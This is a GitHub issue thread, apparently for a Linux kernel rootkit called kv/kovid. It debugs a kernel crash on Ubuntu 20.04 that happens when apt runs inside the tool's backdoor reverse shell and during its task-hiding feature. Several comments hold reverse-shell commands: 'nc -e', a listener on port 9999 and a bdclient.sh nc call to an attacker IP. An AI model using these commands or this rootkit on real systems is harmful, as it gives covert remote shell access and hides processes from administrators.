-
Notifications
You must be signed in to change notification settings - Fork 53
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Crash with ubuntu20.04 on active task #71
Comments
Hi @iusearch thanks for the detailed investigation you did there, I appreciate. I don't have Ubuntu 20.04 at hand (I don't recall testing kv on that particular linux version) but if you run kv doesn't implement itself backdoors, it uses network tools available on the machine (nc, openssl, socat) and inherits their limitations. I testes on ubuntu 18.04 and I dont't get a crash, but it doesn't work either because nc/openssl/socat don't don't either, even in isolated form. |
Sorry don't quite understand that. Do you mean nc -e to pop a reverse shell to the host? |
yes, example: server: nc -lnv 9999 nc/socat/openssl don't offer rich terminal, and apt commands require a lot of interactive shell back-and-fourths. The crash may or may not be related to that , not sure what apt does under the carpet but that could be messing with a weakness withing kv about these backdoors, but they would not work as intended anyway (my guess) even in standalone mode, for these complicate shell interactions. |
No, it can't do that from my side either. I remember apt has multiple backend which can dealt with non tty console though IMO it should not cause a kernel dump. I will try find what's causing the problem |
You are right, it should not cause a kernel crash, but it is not crashing in the version I have just tried, but as soon as I manage to load a 22.04 I will check that, and yes, the crash is during hide/unhide stuff, that is possibly quite messy coming from apt. In the meantime, if you manage to do more tests, please share results here that could be helpful, thank you |
Ya weirdly it does not crash on 22.04 but do crash on 20.04. To be more specifically |
Notice the first lines from your log: 19.473319] kovid: module verification failed: signature and/or required key missing - tainting kernel These messages indicate that hide/unhide is broken and incompatible with that kernel/linux version or setup. |
Interesting. I guess I'm not compatible enough to fix that myself. Hope you can find the root cause for that. Thanks. |
I guess I have just found it. The warning In 5.4 this kernel function does not exist or exists with a different name: Now, check 5.8 for instance, it is present: So, long story short, it is not yet a bug, you are running kv against a kernel whereas it was not ported for and therefore we should not expect it to work anyway. If I port it to your kernel, I will let you know here ok? |
Unfortunately, that's not the end of story. I upgraded the kernel on 20.04 to 5.15, with the following
so it did find the symbol, but still crash on that |
I see, yeah I will do some tests as soon as I can with these kernels, thank you. |
One more hint. Just found out |
hmm "dpkg -i" is not interactive, is it? |
I believe not. I'm trying to get strace to see which syscall actually killed it. Thou openssl is also broken on 20.04.
|
yeah, openssl is a pain in the ass #20 |
Closing this because it is not considered an issue if kernel is unsupported. |
Describe the bug
Crashing with the following dmesg
To Reproduce
Steps to reproduce the behavior:
sudo ./bdclient.sh nc 192.168.x.x xxxxx
from attackerapt install python3
in the reverse shell termina;Additional context
When checking with crash, a warning is shown
Suspect to be something related to task hidden. With latest commit from master.
The text was updated successfully, but these errors were encountered: